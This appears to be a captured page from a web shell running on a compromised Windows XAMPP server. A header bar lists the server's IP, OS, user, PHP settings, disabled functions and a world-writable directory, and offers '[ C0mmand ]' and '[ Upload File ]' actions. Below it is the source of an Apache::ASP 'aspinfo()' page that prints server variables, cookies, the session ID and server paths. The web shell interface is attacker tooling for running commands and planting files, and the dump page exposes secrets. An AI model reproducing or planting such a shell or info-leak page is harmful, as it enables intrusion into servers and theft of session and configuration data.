|
Server IP : 127.0.0.1 / Your IP : 127.0.0.1 Web Server : Apache/2.4.10 (Win32) OpenSSL/1.0.1i PHP/5.6.3 System : Windows NT WIN-R7LTCC7BPLI 6.3 build 9200 (Windows Server 2012 R2 Datacenter Edition) i586 User : GerbangSIPAD ( 0) PHP Version : 5.6.3 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF Directory (0777) : C:/xampp5/htdocs/bhumie/upload/../../xampp/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE HTML Public "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" >
<title>aspinfo()</title>
<style type="text/css">
<!--
a { text-decoration: none; }
a:hover { text-decoration: underline; }
h1 { font-family: arial, helvetica, sans-serif; font-size: 18pt; font-weight: bold;}
h2 { font-family: arial, helvetica, sans-serif; font-size: 14pt; font-weight: bold;}
body, td { font-family: arial, helvetica, sans-serif; font-size: 10pt; }
th { font-family: arial, helvetica, sans-serif; font-size: 10pt; font-weight: bold; }
-->
</style>
</head>
<body>
<div align="center">
<table width="80%" border="0" bgcolor="#000000" cellspacing="1" cellpadding="3">
<tr>
<td align="center" valign="top" bgcolor="#FFFFAE" colspan="2"><h3>Apache::ASP</h3></td>
</tr>
</table>
<br> <hr> <br>
<h3>Server Variables</h3>
<table width="80%" border="0" bgcolor="#000000" cellspacing="1" cellpadding="3">
<%
for(sort keys %{$Request->ServerVariables()}) {
$Response->Write("<tr>\n");
$Response->Write("<th width=\"30%\" bgcolor=\"#FFFFAE\" align=\"left\">$_</th>\n");
$Response->Write("<td bgcolor=\"#FFFFD9\" align=\"left\">$Request->{ServerVariables}{$_} </td>\n");
$Response->Write("</tr>\n");
};
%>
</table>
<br> <hr> <br>
<h3>Cookies</h3>
<table width="80%" border="0" bgcolor="#000000" cellspacing="1" cellpadding="3">
<%
for(sort keys %{$Request->Cookies()}) {
$Response->Write("<tr>\n");
$Response->Write("<th width=\"30%\" bgcolor=\"#FFFFAE\" align=\"left\">$_</th>\n");
$Response->Write("<td bgcolor=\"#FFFFD9\" align=\"left\">$Request->{Cookies}{$_} </td>\n");
$Response->Write("</tr>\n");
};
%>
</table>
<br><hr><br>
<h3>Other variables</h3>
<table width="80%" border="0" bgcolor="#000000" cellspacing="1" cellpadding="3">
<tr>
<th width="30%" bgcolor="#FFFFAE" align="left">Session.SessionID</th>
<td bgcolor="#FFFFD9"><%= $Session->{SessionID} %></td>
</tr>
<tr>
<th width="30%" bgcolor="#FFFFAE" align="left">Server.MapPath</th>
<td bgcolor="#FFFFD9"><%= $Server->MapPath("/") %></td>
</tr>
</table>
</div>
</body>
</html>